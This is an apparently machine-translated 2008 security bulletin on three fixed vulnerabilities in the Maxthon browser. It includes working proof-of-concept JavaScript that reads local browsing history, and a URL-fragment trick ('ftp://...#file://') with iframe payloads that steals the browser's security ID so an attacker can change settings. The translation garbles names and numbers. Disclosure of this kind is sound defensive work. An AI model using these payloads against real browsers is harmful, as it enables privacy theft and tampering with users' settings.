Surf fixes a few security vulnerabilities-vulnerability warning-the black bar safety net

2008-07-02T00:00:00
ID MYHACK58:62200819553
Type myhack58
Reporter 佚名
Modified 2008-07-02T00:00:00

Description

In 80sec notification to travel into the presence of the security vulnerability after that, surf to 6. 3 0 released a new version of the browser, fixes the previously mentioned security vulnerability, the specific update can be found http://blog. maxthon. cn/, the update fixes three security issues, the main problem details are as follows:

Vulnerability sources: http://www.80sec.com/release/maxthon-vulns-poc.txt

1, the browser kernel vulnerability to cause a local cross-domain vulnerability

Vulnerability description: maxthon uses the system of the IE kernel, but the kernel there may be some security vulnerabilities leading to cross-domain attacks, and travel into max:the domain is in the local equivalent to the file://, so this cross-domain attacks will result in the local context of the executing javascript code given here only made surf the browsing history of the POC.

Vulnerability POC to:

<a href="">Maxthon Exploit</a> <script> function win(){ x=window. open("max:history"); setTimeout(function(){ x. location=new String("javascript:x=maxHistory. history. list. site. loadData();for(i=0;i<x. length;i++) document. write(x[i]. site+\”<br>\”);”) },3 0 0 0) } window. onload=function(){ for (i=0;i<document. links. length;i++) { document. links[i]. href=”javascript:win()” } } </script>

Vulnerability fix:in the IE kernel fix before exploring the new version already fix this security vulnerability

2, surf Security Center vulnerability leads to remote modify any user settings

Vulnerability description: travel to the IE kernel of some characteristic is not very understanding, resulting in the processing of some special situation occurs when a security vulnerability. Voyagers the control center is actually a set of HTML+JAVASCRIPT, through these pages you can read sensitive data, modify browser settings, download files, and so on. Of course, travel also has its own security policy, will those HTML files into an external site can not be called directly, because the voyagers have a security control policy, and security. src, this file code is as follows:

var max_security_id="; var url=String(document. location). toLowerCase(); if(url. indexOf('file://')>-1&&amp; url. indexOf('http://')==-1&&amp; url. indexOf('https://')==-1){ max_security_id='{B73B3AC9-B009-4 4 2 9-AE67-514332D791FE}'; }else{ document. location='about:blank'; }

Wherein max_security_id is travel in call a variety of controls must be a parameter, this parameter in each function is a must, each machine max_security_id are not the same. If we can achieve this max_security_id then you can remote to any site called surf the various functions such as settings, read sensitive data or even remote code execution.

First of all, this max_security_id every startup looks like will change, this max_security_id will be stored in the installation directory of the template/security. src, and we can be at your site page, make the following call:

<script src="E:\Program Files\Maxthon2\template\security. src"></script> <script src="d:\Program Files\Maxthon2\template\security. src"></script> <script src="c:\Program Files\Maxthon2\template\security. src"></script>

Don't accident, travel is allowed to do so call the local files: The but security. the src is also limited, only when the location contains a file:///and does not contain the http://and https:///when assigning a value, otherwise it will jump. Here travel there is an error is the blacklist policy lead may be used such as ftp://Protocol bypass, as far as you want to include the file://also very simple:

ftp://www.foo.com/exploit.html#file://80sec.com

这样 一 个 地址 实际 访问 的 是 exploit.html but location it contains file://, the security policy is bypass, you can get max_security_id, and then use the acquired max_security_id can do all operation.

Vulnerability POC to:

To build a anonymousftp serverwww.foo.com and then in a malicious site to do the following quote:

<iframe src="ftp://www.foo.com/history/index.htm#file:///www.80sec.com" width=1 0 0% height=1 0 0%>

/history/index. htm to put in the www. foo. com on a carefully constructed Virus, the easiest way is the official installation directory of the template in history and other subdirectories below the index. html in

<script type="text/javascript" src="../security. src"></script>

Replaced

<script src="E:\Program Files\Maxthon2\template\security. src"></script> <script src="d:\Program Files\Maxthon2\template\security. src"></script> <script src="c:\Program Files\Maxthon2\template\security. src"></script>

By modifying the inside of the index. htm content you can modify the browser settings, read history, etc.

Bug fixes: the new version of the code will be amended to

var max_security_id="; if(String(window. document. location). toLowerCase(). indexOf('file://')==0){ max_security_id='{02E14D94-53C8-4B6D-89AE-755DC5299C6C}'; }else{ document. location='about:blank'; }

Limited to only local files can reference this js, to fix this problem.

3, RSS feeds cross-site scripting vulnerability

Vulnerability description:travel in the realization of an rss function when there is a problem, resulting in access to the problematic page will appear when thexssvulnerability

Vulnerability POC to:subscribe http://www. 80sec. com/feed can see effects:)

Bug fixes:the new version has been fixed

Maxthon treat the vulnerability of the attitude is very rigorous,want Maxthon user as soon as possible to upgrade to the new version.